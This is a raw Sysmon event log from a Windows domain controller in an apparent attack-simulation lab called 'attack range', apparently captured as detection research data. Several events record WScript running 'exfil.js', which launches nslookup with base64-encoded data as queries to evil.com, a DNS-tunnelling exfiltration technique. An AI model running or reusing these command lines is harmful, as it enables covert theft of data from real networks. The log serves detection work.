14:16:27.507{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-FE3F-000000005F02}1496C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.507{2E1864BB-17BB-629A-FC3F-000000005F02}59442800C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-FE3F-000000005F02}1496C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.507{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.507{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.507{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.507{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.518{2E1864BB-17BB-629A-FE3F-000000005F02}1496C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-FC3F-000000005F02}5944C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbocb.tmp 2>&1 10341000x8000000000000000199294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.504{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-FD3F-000000005F02}4796C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.504{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-FD3F-000000005F02}4796C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.485{2E1864BB-17BB-629A-FD3F-000000005F02}47967616C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-FC3F-000000005F02}5944C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.485{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-FD3F-000000005F02}4796C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.469{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-FC3F-000000005F02}5944C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.469{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.469{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.469{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.469{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.469{2E1864BB-17A1-629A-783D-000000005F02}55524936C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-FC3F-000000005F02}5944C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.482{2E1864BB-17BB-629A-FC3F-000000005F02}5944C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbocb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.469{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nluaye.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.438{2E1864BB-17BB-629A-FA3F-000000005F02}79445724C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-FB3F-000000005F02}7184C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.438{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.438{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.438{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.438{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-FB3F-000000005F02}7184C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.438{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.438{2E1864BB-17BB-629A-F93F-000000005F02}28482256C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-FB3F-000000005F02}7184C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.443{2E1864BB-17BB-629A-FB3F-000000005F02}7184C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-F93F-000000005F02}2848C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluaye.tmp 2>&1 354300x8000000000000000199274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.905{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52601- 354300x8000000000000000199273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.905{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52600- 10341000x8000000000000000199272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.407{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-FA3F-000000005F02}7944C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.904{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52599- 354300x8000000000000000199270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.832{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52598- 354300x8000000000000000199269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.832{00000000-0000-0000-0000-000000000000}7556<unknown process>-udptruefalse127.0.0.1-52598-false127.0.0.1-53domain 10341000x8000000000000000199268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.407{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-FA3F-000000005F02}7944C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.832{00000000-0000-0000-0000-000000000000}7556<unknown process>-udpfalsefalse127.0.0.1-52597-false127.0.0.1-53domain 354300x8000000000000000199266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.832{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52597- 354300x8000000000000000199265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.831{00000000-0000-0000-0000-000000000000}7556<unknown 